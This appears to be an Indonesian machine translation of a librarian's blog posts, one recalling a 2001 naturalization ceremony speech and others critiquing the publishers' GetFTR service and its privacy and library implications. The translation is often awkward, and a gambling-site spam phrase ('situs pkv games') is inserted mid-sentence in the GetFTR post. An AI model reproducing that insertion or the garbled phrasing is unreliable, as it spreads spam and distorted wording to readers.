Refleksi tentang “Tanggung Jawab Kewarganegaraan untuk Imigran dan Putri Kami”

Delapan belas tahun yang lalu, pada hari Jumat, 7 September 2001, saya merasa terhormat diminta untuk berpartisipasi dalam upacara naturalisasi untuk 46 warga baru Amerika Serikat di ruang sidang Hakim Alvin Thompson di Hartford, Connecticut. Saya menerbitkan komentar-komentar itu di situs web yang telah lama tidak aktif. Mengingat politik saat itu, saya berpikir kembali ke upacara itu dan apa artinya bagi saya untuk berpartisipasi. Saya menyesali referensi norak untuk Star Trek , tetapi saya tidak menyesali apa pun yang saya katakan pada hari itu. Saya memberi judul komentar “Tanggung Jawab Kewarganegaraan untuk Imigran dan Putri kami”.

Selamat sore. Saya merasa terhormat berada di sini saat Anda mengambil langkah terakhir untuk menjadi warga negara Amerika Serikat. Istri saya Celeste, yang akan segera melahirkan warga negara Amerika baru, ada di sini untuk merayakan kesempatan yang menggembirakan ini bersama Anda. Dan jika Anda akan memaafkan renungan seorang calon ayah yang bangga, saya ingin berbagi pemikiran tentang kewarganegaraan yang terinspirasi oleh upacara ini dan kedatangan anak pertama kami yang akan datang.

Putri kami akan menjadi warga negara sejak lahir, tetapi Anda telah membuat pilihan untuk menjadi orang Amerika. Pilihan ini mungkin atau mungkin tidak mudah bagi Anda, tetapi saya sangat menghargai Anda karena telah membuat pilihan itu.

Saya tidak tahu apa yang memaksa Anda untuk tunduk pada proses naturalisasi – mungkin alasan ekonomi, politik, sosial, atau agama. Saya harus berpikir bahwa Anda melakukannya untuk memperbaiki hidup Anda dan kehidupan keluarga Anda. Tetapi Anda harus tahu bahwa prosesnya tidak berhenti sampai di sini.

Seiring dengan hak kewarganegaraan, muncul tanggung jawab yang diharapkan dari Anda. Mungkin Anda lebih sadar akan tanggung jawab ini daripada saya memberikan pilihan Anda untuk menjadi warga negara, tapi tolong izinkan saya untuk menyebutkan beberapa dari mereka. Gunakan hak Anda untuk didengarkan tentang masalah yang menjadi perhatian Anda. Pilih di setiap pemilihan yang Anda bisa. Ketika diminta untuk melakukannya, dengan bersemangat menjalankan tugas Anda sebagai anggota juri. Perhatikan apa yang terjadi di sekitar Anda, dan bentuk opini Anda sendiri. Praktikkan agama Anda dan hormati hak orang lain untuk melakukan hal yang sama. Inilah nilai-nilai yang akan kami coba tanamkan pada putri kami; Saya harap Anda membawa mereka ke dalam hati, menanamkan mereka dalam anggota keluarga Anda, dan menginspirasi sesama warga Anda untuk melakukan hal yang sama.

Tetapi ketika Anda mengambil langkah kewarganegaraan formal dan final ini, ketahuilah bahwa menjadi orang Amerika tidak berarti Anda harus meninggalkan budaya asli Anda. Bagian dari budaya Amerika adalah pertunjukan Star Trek tahun 1960-an , yang mempromosikan konsep IDIC: Diversity Tak Terbatas dalam Kombinasi Tak Terbatas. Di dunia yang futuristik itu, beragam budaya dan ide dihormati dengan kesadaran bahwa masyarakat lebih kuat karenanya. Meskipun kita tidak dapat mengklaim telah mencapai dunia ideal itu, kita dapat mengatakan bahwa Impian Amerika paling baik diwujudkan ketika keragaman kita dirayakan dan dibagikan oleh anggota-anggota negara ini. Putri saya akan merayakan keragaman itu: produk dari imigran Irlandia, Jerman, Polandia, dan Inggris. Dengan menambahkan sejarah dan pengalaman Anda sendiri ke struktur negara kita, Anda membuat Amerika lebih kuat. Selain semua tanggung jawab formal yang diminta Anda sebagai warga negara baru, saya menagih Anda untuk berbagi dengan sesama warga negara Anda apa yang membuat Anda unik.

Warga terhormat kami di masa lalu berjuang keras untuk membuat negara ini seperti sekarang ini. Ketika mereka menunjukkan keberanian, kita juga harus siap untuk menunjukkan keberanian. Ketika mereka mengalami rasa sakit, kita juga harus siap untuk berkorban demi kebaikan bangsa kita. Seperti mereka, kita juga harus berjuang untuk kebebasan dan keadilan untuk semua. Sebagai orang Amerika, kita semua dipenuhi dengan harapan dan impian ini.

Atas nama istri saya dan putri kami segera akan lahir, dan orang tua, saudara lelaki, dan saudara perempuan saya, orangtua Celeste, dua saudara perempuan dan keluarga mereka, dan atas nama rakyat Hartford, Negara Bagian Connecticut, dan warga negara dari semua 50 negara bagian, saya mengucapkan selamat kepada Anda atas peran baru Anda sebagai warga negara Amerika Serikat. Silakan gunakan kekuatan yang sekarang berada di tangan Anda untuk memajukan penyebab harapan dan peluang serta keragaman. Saya mengundang Anda untuk menjadi peserta aktif dalam bab selanjutnya dari sejarah kemajuan Amerika menuju tujuan kebebasan dan kesetaraan untuk semua.

Empat hari kemudian — 11 September 2001 — lintasan kehidupan orang-orang di ruang sidang itu akan berubah. Kami tidak tahu berapa banyak mereka akan berubah. Kami masih tidak tahu berapa banyak mereka akan berubah.

Kepada warga negara yang baru dinaturalisasi ini, saya berbicara tentang kepercayaan yang menurut saya universal Amerika. Mereka adalah keyakinan yang saya tumbuh bersama … yang ditanamkan dalam diri saya oleh orang tua saya dan komunitas tempat saya tinggal.

Apakah saya tumbuh dalam gelembung? Apakah selalu ada sesama warga di sekitar saya yang ingin menghalangi orang lain datang ke negara ini dan mengusir siapa pun yang tidak terlihat seperti mereka? Apakah selalu ada agen kejam dari pemerintah yang menganggap masuk akal untuk mengunci sesama manusia di dalam kandang, untuk memisahkan anak-anak dari orang dewasa yang mengasuh, untuk memilih orang dari ras lain untuk pengawasan yang luar biasa, dan tampaknya menemukan sukacita dalam melakukannya?

Saya sekarang bergumul dengan pertanyaan-pertanyaan ini. Saya berjuang untuk memahami bagaimana pemilihan seseorang untuk memimpin negara kita telah menjadi lensa fokus untuk divisi. (Trump? Obama?) Saya berjuang untuk memahami campuran beracun dari ketidaktahuan yang disengaja dan kesombongan budaya telah membentuk cara kita memandang satu sama lain, cara kita mendengar satu sama lain, dan cara kita berbicara satu sama lain. Saya ingin mempercayai bahwa ada benang merah umat manusia yang berkelok-kelok di antara dan di antara warga dan pengunjung Amerika — utas yang mengikat kita cukup erat untuk bekerja menuju tujuan bersama dan cukup longgar untuk memungkinkan karakter individu.

Saya berbicara dan saya mendengarkan. Saya berjuang dan saya percaya. Saya harus … untuk putri saya, saudara lelakinya yang mengikuti, dan untuk 46 warga baru yang saya sambut 18 tahun yang lalu.

Penerbit berjalan sendiri (untuk saat ini?) Dengan GetFTR

Pada awal Desember 2019, sekelompok penerbit mengumumkan Get-Full-Text-Research , atau singkatnya GetFTR. Saya membaca tentang ini pertama kali dalam tulisan Roger Schonfeld “ Penerbit Mengumumkan Layanan Baru Utama untuk Menghilangkan Kebocoran ” di The Scholarly Kitchen melalui utas dan posting blog Jeff Pooley . Detail tentang bagaimana ini bekerja sangat tipis , jadi saya sangat bergantung pada deskripsi Roger. Saya tidak separah ini tentang Jeff, dan saya mungkin sedikit lebih banyak berpendapat daripada Roger. Ini adalah langkah yang menarik oleh penerbit, dan — seperti yang disarankan oleh judul tulisan ini — saya kritis terhadap pendekatan “go-it-alone” penerbit.

Pertama, beberapa pengungkapan mungkin dilakukan secara berurutan. Latar belakang saya membuat saya memikirkan hal ini dalam konteks bagaimana dampaknya terhadap perpustakaan dan konsorsium perpustakaan. Selama empat tahun terakhir, saya telah menjadi ketua bersama komite topik Penemuan Informasi dan Pertukaran NISO (dan pendahulunya, komite topik “Penemuan untuk Pengiriman”), jadi ini persis seperti apa yang saya pikirkan di ruang profesional perpustakaan-penerbit yang lebih luas. Saya juga menelusuri perkembangan awal RA21 dan baru-baru ini menjadi sukarelawan di Kategori Entitas SeamlessAccess dan Kelompok Kerja Atribut Bundel; yang akan menjadi lebih penting sedikit lebih jauh di bawah tulisan ini.

Aku mengangguk bersama narasi Roger sampai aku berhenti di sini:

Lima rumah penerbitan utama yang merupakan kekuatan pendorong di belakang GetFTR tidak mengejar inisiatif ini melalui salah satu badan kolaborasi industri utama. Kelima adalah anggota terkemuka dari Asosiasi STM, NISO, ORCID, Crossref, dan CHORUS, untuk menyebut beberapa kelompok industri besar. Tetapi alih-alih bekerja melalui salah satu kelompok yang ada ini, rumah-rumah malah merencanakan untuk meluncurkan badan hukum baru.

Sementara [Wakil Presiden Strategi Produk & Kemitraan untuk Wiley Todd] Toler dan [Direktur Senior, Strategi Teknologi & Kemitraan untuk American Chemical Society Ralph] Youngen terlalu politis untuk membahas secara mendalam rincian mengapa ini mungkin terjadi, jelas bahwa kepemimpinan rumah-rumah besar telah merasakan ketidakcocokan besar antara prioritas bisnis mereka di satu sisi dan kemampuan dari badan-badan industri yang ada. Pada acara-acara industri baru-baru ini, CEO penerbit telah menyuarakan keprihatinan yang luas tentang kurangnya inovasi yang didorong kerjasama di sektor ini. Misalnya, Judy Verses dari Wiley berbicara tentang masalah ini pada musim semi 2018 , dan beberapa eksekutif melakukannya di Frankfurt musim gugur ini.. Dalam kedua kasus, anggota lama dari sektor penerbitan ilmiah mempertanyakan apakah para eksekutif ini mungkin tidak menyadari kolaborasi luas yang didorong melalui Crossref dan ORCID, antara lain. Sekarang jelas bagi saya bahwa masalah ini bukanlah kurangnya pengetahuan, tetapi lebih pada kekhawatiran di tingkat eksekutif tentang ketidakmampuan kendaraan kolaboratif yang ada untuk memungkinkan arahan strategis baru yang menurut penerbit harus dikejar.

Ini adalah penerbit yang berjalan sendiri. Untuk melihat Roger menggambarkannya, mereka akan membuat layanan web situs pkv games yang memungkinkan penerbit menentukan salinan yang sesuai untuk pelindung dan melakukannya tanpa masukan dari perpustakaan. Pustakawan hanya akan diharapkan untuk menempatkan widget layanan web ini ke dalam layanan penemuan mereka untuk mendapatkan “tombol berwarna yang menunjukkan bahwa tautan tersebut akan membawa [pelanggan] ke versi catatan, jalur alternatif, atau (mungkin dalam kasus yang jarang terjadi) tidak ada akses sama sekali . ” (Mari kita kesampingkan implikasi privasi dari memiliki layanan web pihak keempat yang merekam semua artikel individual yang muncul dalam hasil pencarian pelindung.) Pustakawan tidak akan dapat memutuskan “jalur alternatif” yang sesuai untuk pelindung: “Beberapa penerbit mungkin memilih untuk menyediakan akses ke pracetak atau versi hanya-baca, mungkin dalam beberapa kasus berdasarkan jenis meteran. ” (Roger melanjutkan dengan mengatakan bahwa ia “berharap [s] penerbit biasanya akan mengaktifkan beberapa versi alternatif untuk konten mereka, dalam hal ini sebagian besar konten ilmiah akan tersedia secara bebas melalui penerbit bahkan jika itu tidak membuka akses dalam hal perizinan “Saya tidak begitu percaya diri.)

Tidak terima kasih. Jika penerbit ingin terlibat dalam pekerjaan teknis untuk mengaktifkan perpustakaan dan lainnya untuk membangun layanan web yang menentukan tautan langsung ke artikel berdasarkan DOI, maka hebat. Perpustakaan dapat membangun alat yang mengkonsumsi informasi itu serta memperhitungkan informasi akun tentang layanan pracetak, versi akses terbuka, pinjaman antar perpustakaan dan metode akses lainnya. Tetapi untuk meminta perpustakaan menerima tombol akses yang dikontrol penerbit ini di lapisan penemuan mereka, sistem manajemen pembelajaran mereka, layanan profil ilmiah mereka, dan alat-alat mereka yang lain? Kedengarannya ditakdirkan untuk kekecewaan.

Saya hanya sedikit terdorong oleh kenyataan bahwa RA21 dimulai sebagai kolaborasi kecil penerbit yang terisolasi sebelum mereka membawa NISO dan mengundang perpustakaan untuk bergabung dalam diskusi. Apakah itu berarti memperlambat penyebaran RA21? Tidak diragukan lagi ya. Apakah pustakawan yang gigih menuntut diskusi dan keputusan yang transparan tentang masalah terkait privasi seperti atribut apa yang akan diperoleh penerbit tentang pelindung di backchannel yang didukung Shibboleth? Ya, tetapi karena pelanggan tidak ada di sana untuk mengadvokasi diri mereka sendiri. Apakah ini mungkin berarti adopsi yang lebih luas? Saya ingin berpikir begitu.

Sudahkah penerbit mengetahui bahwa memaksakan teknologi semacam ini ke pengguna tanpa berkonsultasi adalah ide yang buruk? Saat ini tidak akan muncul. Beberapa yang dicari oleh penerbit dengan GetFTR dapat diimplementasikan dengan OpenURL langsung atau — paling tidak — penambahan lingkup terbatas pada OpenURL ( standar terbuka Z39.88 !). Sehingga mereka tidak memulai dengan OpenURL, standar yang ada yang kuat, yang memprihatinkan dan mengganggu. Saya akan menonton dan mendengarkan poin-poin pertunangan, jadi saya tetap berharap.

Beberapa kata tentang lima langkah Jeff Pooley “usaha berderit dan penuh gesekan yang menggelikan” yaitu SeamlessAccess. Banyak dari langkah-langkah yang dijelaskan Jeff adalah protokol teknis yang tidak terlihat dan mapan. Apa yang gagal diperhitungkan Jeff adalah efek yang terlihat dan penuh gesekan dari para pelanggan yang mengakses konten di luar batas-batas alamat jaringan internet yang diakui kampus. Pelanggan itu dihentikan pada langkah kedua dengan pesan “bayar $ 35 silakan”. Saya semua untuk menghapus penghalang itu sepenuhnya dengan membuat semua konten yang diterbitkan “akses terbuka”. Adalah bodoh untuk berpikir bahwa para peneliti dan pembaca dapat menerapkan model bisnis akses terbuka pada semua penerbit, sehingga solusi seperti SeamlessAccess akan mendapat tempat.

Apa yang diketahui tentang GetFTR pada akhir 2019

Pada awal Desember 2019, sekelompok penerbit mengumumkan Get-Full-Text-Research , atau singkatnya GetFTR. Ada heck respon di media sosial, dan responnya — secara keseluruhan — tidak positif dari sudut Twitter saya yang didominasi pustakawan. Untuk pengambilan awal saya di GetFTR, lihat posting blog saya 3 Desember “ Penerbit berjalan sendiri (untuk saat ini?) Dengan GetFTR .” Seperti yang disarankan judul posting itu, saya membawa lima penerbit GetFTR pendiri untuk mengerjakan pendekatan take-it-or-leave-it mereka. Saya pikir itu masih menjadi masalah. Untuk membuat Anda ketahuan, berikut adalah daftar komentar lainnya.

  • Roger Schonfeld, 3 Desember, “ Penerbit Mengumumkan Layanan Besar Baru untuk Menghubungkan Kebocoran ” di The Scholarly Kitchen
  • Tweet dari Herbert Van de Sompel , penulis utama spec OpenURL, untuk menyelesaikan masalah penyalinan yang sesuai
  • 5 Desember posting “ Dapatkan Untuk Fulltext Ourself, Not GetFTR. ”Di blog Open Access Button
  • Utas Twitter pada 7 Desember antara @cshillum dan @lisalibrarian mengenai penentuan posisi GetFTR terkait dengan tautan resolver dan pertanyaan yang belum terjawab tentang bagaimana GetFTR sejajar dengan minat perpustakaan
  • Utas Twitter dimulai oleh @TAC_NISO pada tanggal 9 Desember mencari informasi lebih lanjut dengan tautan ke presentasi Asosiasi STM yang ditambahkan oleh @aarontay
  • Sebuah pohon tweets mulai dari @mrgunn ‘s [Saya tidak penerbit kepercayaan untuk memutuskan] adalah inti dari semuanya. Secara khusus, utas tweet itu yang mencakup Jason Griffey dari NISO mengatakan dia tidak tahu apa-apa tentang GetFTR dan poin Bernhard Mittermaier tentang motivasi tersembunyi di balik GetFTR
  • Utas Twitter dimulai oleh @aarontay pada 7 Desember yang mengatakan “GetFTR buruk bagi para peneliti / pembaca dan pustakawan. Itu hanya menguntungkan penerbit, ubah pikiran saya. ”
  • Lisa Janicke Hinchliffe 10 Desember “ Mengapa Pustakawan Prihatin dengan GetFTR? ”Di The Scholarly Kitchen dan catat diskusi tindak lanjut dalam komentar
  • Utas Twitter antara @alison_mudditt dan @lisalibrarian mengklarifikasi PLOS tidak ada di Dewan Penasihat dengan beberapa @TAC_NISO juga.
  • Ian Mulvany pada 11 Desember “ pemikiran tentang GetFTR ” di ScholCommsProd
  • GetFTR 11 Desember “ Memperbarui komunitas ” posting di situs web mereka
  • Federasi Spanyol dari Asosiasi Pengarsip, Pustakawan, Arkeolog, Museologis dan Documentalists (ANABAD) 12 Desember “ GetFTR: layanan penerbit baru untuk mempercepat akses ke artikel penelitian ” (asli dalam bahasa Spanyol, Google Translate ke Bahasa Inggris )
  • Entri berita 20 Desember dari eContent Pro dengan judul ” Apa Arti GetFTR untuk Akses Artikel Jurnal ” yang hanya akan saya pertengkarkan dengan kalimat ini: “Jadi, GetFTR adalah layanan tempat artikel Akademik ditemukan dan diberikan kepada Anda tanpa biaya sama sekali. ” Tidak — jika Anda berada di dunia akademis biayanya ditanggung oleh perpustakaan Anda meskipun Anda tidak melihatnya. Tapi ini seperti layanan pihak ketiga yang tidak terkait langsung dengan penerbit atau perpustakaan, jadi mungkin mereka dapat dimaafkan karena tidak mendapatkan nuansa itu.
  • Posting berita Wiley Chemistry Views pada tanggal 26 Desember berjudul hanya ” Get Full Text Research (GetFTR) ” mungkin hanya penting untuk kalimat “Kebocoran yang tumbuh terus mengikis kemampuan penerbit untuk menghasilkan uang dari nilai yang mereka ciptakan.”

Jika Anda mencari daftar pendek tentang apa yang harus dilihat, saya merekomendasikan posting ini.

Pembaruan Komunitas GetFTR

Pada 11 Desember — setelah dua posting yang saya tuliskan di bawah ini — halaman web “ Memperbarui Komunitas ” diposting ke situs web GetFTR. Dari perspektif hubungan masyarakat, itu … menarik.

Kami berkomitmen untuk terbuka dan transparan

Bagian ini selanjutnya mengatakan, “Jika komunitas merasa kita perlu menambahkan pustakawan ke kelompok penasihat kita, kita pasti akan melakukannya dan kita akan mencari cara untuk memastikan kita terlibat dengan sebanyak mungkin pemangku kepentingan pustakawan kita.” Jika kepemimpinan GetFTR tidak mendapatkan indikasi antara 3 Desember dan 12 Desember bahwa pustakawan merasa kuat tentang berada di meja, maka saya tidak tahu apa yang akan terjadi. Dan ini bukan tentang menjadi anggota kelompok penasihat; ini tentang dilihat dan dihargai sebagai pemangku kepentingan penting dalam proses penemuan penelitian. Saya tidak yakin siapa “komunitas” di bagian ini, tetapi jelas bahwa pustakawan adalah – paling-paling – pikiran setelahnya. Itu bukan jenis “terbuka dan transparan” yang ramah.

Kemudian di bagian Pertanyaan tentang penyelesai tautan perpustakaan adalah kalimat ini:

Kami telah, atau berencana untuk, berkonsultasi dengan dewan penasihat perpustakaan yang ada yang dimiliki penerbit yang berpartisipasi, karena hal ini memungkinkan kami untuk mengumpulkan pandangan dari sejumlah besar pustakawan dari seluruh dunia, di berbagai lembaga yang berbeda.

Seperti yang saya katakan di posting saya sebelumnya, saya tidak tahu mengapa GetFTR tidak terlibat dalam organisasi lintas komunitas (penerbit / teknologi-pemasok / perpustakaan) untuk melakukan diskusi ini. Rasanya disengaja, yang mewarnai persepsi tentang apa yang ingin dicapai oleh penerbit. Sejujurnya, saya tidak berpikir penerbit menggunakan GetFTR untuk mendorong perbedaan antara penyedia layanan teknologi perpustakaan (yang diperlukan untuk membuat GetFTR menjadi kenyataan bagi perpustakaan) dan perpustakaan itu sendiri. Tapi saya bisa melihat bagaimana interpretasi itu dibuat.

Maklum, kami ditanyai soal privasi.

Saya mencari privasi di pos saya sebelumnya, jadi mari kita bicarakan di sini. Masih harus dilihat apa yang termasuk dalam permintaan API GetFTR antara browser dan situs penerbit. Tentu, itu perlu menyertakan DOI dan token yang mengidentifikasi institusi pelindung. Kami dapat memeriksa bahwa permintaan API untuk memastikan tidak ada lagi yang termasuk. Tetapi fakta bahwa desain GetFTR memiliki browser membuat panggilan ke situs penerbit berarti bahwa situs penerbit tahu alamat IP dari browser pelindung, dan alamat IP dapat dianggap informasi pengidentifikasi pribadi. Masalah ini dapat diperbaiki dengan meminta penyelesai tautan atau perangkat lunak lapisan penemuan membuat permintaan API, dan menurut Pertanyaan tentang bagian penyelesai tautan perpustakaan dari pembaruan komunitas, ini mungkin sedang dipertimbangkan.

Jadi, ya, kebijakan dan implementasi privasi yang dapat diaudit adalah kunci untuk GetFTR.

GetFTR berkomitmen penuh untuk mendukung agregator pihak ketiga

Ini bagus untuk didengar. Saya ingin melihat lebih banyak informasi yang diterbitkan tentang ini, termasuk bagaimana repositori khusus disiplin dan repositori institusional dapat memiliki kepemilikan mereka diwakili dalam tanggapan GetFTR.

Ambillah jalan saya

Dalam paragraf kedua hingga terakhir: “Para peneliti harus memiliki jalur yang mudah dan mulus untuk meneliti, pada platform apa pun yang mereka gunakan, di mana pun mereka berada.” Itu adalah pernyataan yang saya pikir setiap perpustakaan dapat masuk. Ini Memperbarui Komunitas adalah awal yang baik, tetapi proyek memiliki digali lubang yang dalam kepercayaan dan belum mencapai permukaan tanah belum.

Lisa Janicke Hinchliffe, “Mengapa Pustakawan Peduli tentang GetFTR?”

Diposting pada 10 Desember di The Scholarly Kitchen , Lisa menguraikan serangkaian kekhawatiran dari perspektif pustakawan. Saya setuju dengan beberapa di antaranya; yang lain tidak masalah menurut saya.

Kepedulian Pustakawan: Koneksi ke Akses Seamless

Banyak pustakawan telah menyatakan keprihatinan tentang bagaimana informasi pelindung dapat bocor ke penerbit melalui pengaturan yang dipertimbangkan dengan buruk di penyedia identitas lembaga. Seamless Access dapat mempermudah kontrol akses karena memanfaatkan solusi akses masuk kampus — sesuatu yang mungkin sudah dikenal oleh pelindung perpustakaan. Jika penyedia identitas lembaga terlalu permisif dalam atribut tentang pelindung yang dikirimkan ke penerbit, maka ada risiko serius untuk mengikat aktivitas penelitian pengguna dengan identitas mereka dan hal-hal buruk yang datang dari itu (pelanggan menyensor diri mereka sendiri). jalur penelitian, komoditisasi kegiatan pelindung, dll.). Saya melayani di gugus tugas Seamless Access yang menangani masalah ini, dan saya pikir ada solusi teknis, kebijakan, dan pendidikan untuk masalah ini. Khususnya,

Kepedulian Pustakawan: Basis Pengguna Terbatas Diaktifkan

Seperti yang ditunjukkan Lisa, populasi institusi yang dapat memanfaatkan Seamless Access, prasyarat untuk GetFTR, sangat kecil dan sangat berbobot terhadap institusi dengan sumber daya yang baik. Sejauh proyek-proyek seperti Seamless Access (didorong oleh keinginan untuk memiliki fungsi mirip-GetFTR) membantu dengan penerapan infrastruktur berbasis SAML seperti Shibboleth, maka seluruh komunitas akademik mendapat manfaat dari otentikasi bersama / lapisan identitas yang dapat diasumsikan untuk eksis.

Kepedulian Pustakawan: Penyisipan Batu sandungan Baru

Dari masalah yang disebutkan Lisa di sini, saya tidak khawatir tentang pengguna yang dialihkan ke sistem sistem masuk tunggal kampus mereka di beberapa browser di beberapa mesin. Ini adalah sesuatu yang harus kami latih pengguna — ada satu situs web untuk memasukkan nama pengguna / kata sandi Anda untuk apa pun yang Anda akses di institusi. Bahwa pengguna mungkin sudah masuk ke sistem sistem masuk tunggal institusi dalam melakukan pekerjaan sekolah lainnya dan tidak pernah melihat layar masuk adalah manfaat yang menarik bagi sistem ini.

Yang mengatakan, itu akan berguna untuk panggilan API dari lapisan penemuan perpustakaan ke titik akhir GetFTR penerbit untuk dapat mengatakan, “Ini adalah pengguna saya. Percayalah ketika saya mengatakan bahwa mereka berasal dari institusi ini. ” Jika itu mungkin, maka layanan Seamless Access Where-Are-You-From dapat dilewati untuk tujuan GetFTR menentukan apakah institusi pengguna memiliki akses ke artikel di situs penerbit. Tentu akan menyenangkan jika pustakawan terlibat dalam spesifikasi protokol yang mendasari sejak awal sehingga kasus penggunaan ini dapat ditawarkan.

Memperbarui

Lisa menjangkau di Twitter untuk mengatakan (sebagian): “Masalahnya adalah GetFTR tidak mengarahkan dan SA tidak ketika Anda diauthentikasi IP. Oleh karena itu, pengguna akhirnya mendapat pengalaman buruk. ” Saya kembali untuk membaca Scholarly Kitchen-nyamemposting dan menyadari saya tidak sepenuhnya mengerti maksudnya. Jika GetFTR mengandalkan token Akses Seamless untuk mengetahui institusi mana pengguna berasal, maka token itu harus masuk ke browser pengguna. Detail yang telah kita lihat tentang GetFTR tidak membahas bagaimana token institusi Seamless Access dimasukkan ke dalam browser pengguna jika pengguna belum mengunjungi portal pilih-lembaga-lembaga Seamless Access Anda. Salah satu kasus tersebut adalah ketika pengguna datang dari komputer yang diautentikasi dengan alamat IP pada jaringan kampus. Apakah indikator GetFTR muncul bahkan ketika token institusi Akses Seamless tidak disimpan di browser? Jika di situs penerbit, respons GetFTR juga menggunakan tabel alamat IP institusi untuk menentukan hak, apa yang dilihat pengguna ketika mereka tidak memiliki token institusi Seamless Access atau alamat IP institusi? Dan, to the point Lisa, bagaimana seseorang menjelaskan perbedaan ini kepada pengguna? Apakah situasinya lebih baik jika penentuan GetFTR dibuat di resolver tautan daripada di browser pengguna?

Kepedulian Pustakawan: Pengecualian dari Komite Penasihat

Lihat paragraf sebelumnya. Bahwa pustakawan tidak di meja menawarkan kasus penggunaan dan saran teknis berarti bahwa pengembang cenderung menutup opsi yang memenuhi kebutuhan perpustakaan. Mengatasi kebutuhan tersebut akan memudahkan penerimaan proyek GetFTR sebagai saling menguntungkan. Jadi tegas “SETUJU!” dengan Lisa pada poinnya di bagian ini. Penerbit — apa yang Anda pikirkan?

Perpustakaan dan perusahaan teknologi perpustakaan melakukan investasi yang signifikan dalam alat-alat yang memudahkan jalan dari penemuan ke pengiriman. Apakah pemecah tautan perpustakaan akan mendapat manfaat dari panggilan API waktu-nyata ke layanan penerbit yang menentukan URL langsung ke DOI tertentu? Oh, ya — itu akan sangat bermanfaat. Perpustakaan dapat menempatkan tautan itu tepat di atas serangkaian opsi yang mencakup tautan ke versi artikel di repositori Green Open Access, pengalihan ke agregator konten, akses satu klik ke formulir pinjaman antar perpustakaan, atau bahkan pilihan di mana perpustakaan membeli salinan artikel atas nama pelindung. (Kemungkinan besar, resolver tautan akan mengambil hak patron ke URL artikel yang disediakan oleh GetFTR, tetapi resolver tautan perpustakaan harus berada dalam loop untuk dapat menawarkan opsi lain.)

Ambillah jalan saya

Pelindungnya berafiliasi dengan institusi, dan institusi (melalui perpustakaan) berlangganan layanan dari penerbit. Perpustakaan lembaga paling tahu opsi apa yang tersedia untuk pelindung (lihat bagian di atas). Ingin tahu mengapa pustakawan khawatir? Karena mereka memasukkan diri mereka sebagai wasit dari akses ke konten, apakah itu dalam kepentingan pelindung terbaik atau tidak. Ini juga berguna untuk memperkuat paragraf penutup Lisa:

Apakah GetFTR akan bertindak untuk memulihkan masalah ini masih harus dilihat. Dalam beberapa kasus, saya berharap mereka akan melakukannya. Di negara lain, mereka mungkin tidak. Minat penerbit tidak selalu selaras dengan minat perpustakaan dan mereka dapat menerima hubungan yang berantakan dengan komunitas perpustakaan sebagai harga yang harus dibayar untuk mengejar tujuan strategis mereka.

“Pikiran tentang GetFTR” dari Ian Mulvany

Seluruh posting Ian mulai 11 Desember di ScholCommsProd patut dibaca. Saya pikir ini adalah pandangan mendalam tentang teknologi dan implikasinya. Inilah beberapa komentar spesifik:

Klarifikasi hubungan antara SeamlessAccess dan GetFTR

Ada beberapa hal yang tidak saya setujui:

OK, jadi apa bedanya, bagi pengguna, antara seamlessaccess dan GetFTR? Saya pikir perbedaannya adalah sebagai berikut – dengan akses tanpa batas Anda pengguna harus masuk ke situs penerbit. Dengan GetFTR jika Anda memberikan halaman yang berisi DOI (seperti pada layanan penemuan) kepada peneliti Anda, Anda dapat memberi mereka tautan yang dapat mereka klik yang telah disiapkan untuk membuat para pengguna akses langsung ke konten. Itu berarti sebagai peneliti, selama layanan penemuan membuat Anda sebagai pengguna yang diautentikasi, Anda tidak perlu memikirkan login, atau kredensial akses penerbit.

Sejauh pemahaman saya, ini tidak benar. Dengan SeamlessAccess, pengguna tidak “masuk ke situs penerbit.” Jika situs penerbit tidak tahu siapa pengguna, pengguna akan kembali ke layanan masuk tunggal lembaga mereka untuk mengautentikasi. Jika situs penerbit tidak tahu dari mana pengguna berasal, itu memanggil layanan SeamlessAccess Where-Are-You-From untuk mengetahui layanan akses masuk institusi mana yang sesuai untuk pengguna. Jika pengguna mengikuti tautan yang disediakan GetFTR ke situs penerbit tetapi pengguna tidak memiliki token otentikasi yang diperlukan dari layanan akses masuk tunggal lembaga, maka mereka akan dipantulkan kembali untuk nama pengguna / kata sandi dan dialihkan ke situs penerbit. .

Apa artinya ini untuk Akses Terbuka Hijau

Poin kunci yang diangkat Ian adalah ini:

Salah satu contoh bagaimana ini dapat menyedot, mari bayangkan bahwa ada versi OA hijau yang sangat berguna dari sebuah artikel, tetapi penerbit ingin mendorong saya untuk menggunakan beberapa “versi fungsionalitas terbatas e-reader” yang memerlukan registrasi akun, atau semoga saja aktivitas browser, atau aplikasi desktop. Jika penerbit hanya menunjukkan versi utilitas terbatas ini, dan bukan versi hijau, yah itu payah.

Oh, ya … itu payah, dan itu karena perpustakaan — bukan penerbit catatan — lebih baik diposisikan untuk mengetahui apa yang terbaik untuk pengguna tertentu.

Apakah GetFTR akan diadopsi?

Ian bertanya, “Apakah Google Cendekia akan menerapkan ini, akankah layanan penemuan lainnya melakukannya?” Saya bertanya-tanya apakah GetFTR cukup besar untuk menarik perhatian Google Cendekia dan Microsoft Research. Usus saya mengatakan “tidak” : Saya tidak berpikir Google dan Microsoft akan menambahkan tombol GetFTR ke layar hasil pencarian mereka kecuali mereka dibayar banyak . Adapun Google Cendekia, lebih mungkin bahwa Google akan membangun sesuatu seperti GetFTR untuk mendapatkan analitik daripada mengandalkan versi penerbit.

Saya bahkan lebih ragu bahwa perusahaan yang mendorong GetFTR dapat meyakinkan pembuat lapisan penemuan untuk menanamkan GetFTR ke dalam perangkat lunak mereka. Karena dua lapisan penemuan yang diadopsi secara luas (setidaknya di Amerika Utara) juga merupakan agregator konten jurnal, saya tidak melihat perusahaan-perusahaan penemuan-lapisan / agregator mendevaluasi produk mereka dengan secara aktif mendorong pengguna keluar dari situs mereka.

Ambillah jalan saya

Juga bermanfaat untuk memperkuat paragraf penutup Ian:

Saya punya dua rekomendasi lain untuk tim GetFTR. Keduanya berhubungan dengan membangun kepercayaan. Pertama, jangan daftar orgs sebagai anggota dewan penasehat, padahal sebenarnya tidak. Kedua, akan sangat bagus untuk belajar tentang tim di balik penciptaan Layanan. Saat ini semuanya sangat anonim.

Dimana kita berdiri?

Wow, saya tidak bermaksud menulis 2.500 kata tentang topik ini. Pada awalnya saya hanya meluangkan waktu untuk meninjau semua yang terjadi sejak ini diumumkan pada awal Desember dan melihat apa yang bisa saya rasakan dari itu. Itu berubah menjadi semacam tinjauan literatur.

Sementara GetFTR memiliki beberapa pendukung yang kuat, GetFTR juga memiliki beberapa pemblokir yang cukup besar:

  • Dapatkah GetFTR membantu memacu adopsi Seamless Access cukup untuk meyakinkan lembaga besar dan kecil untuk berinvestasi dalam infrastruktur penyedia identitas dan sistem akses tunggal?
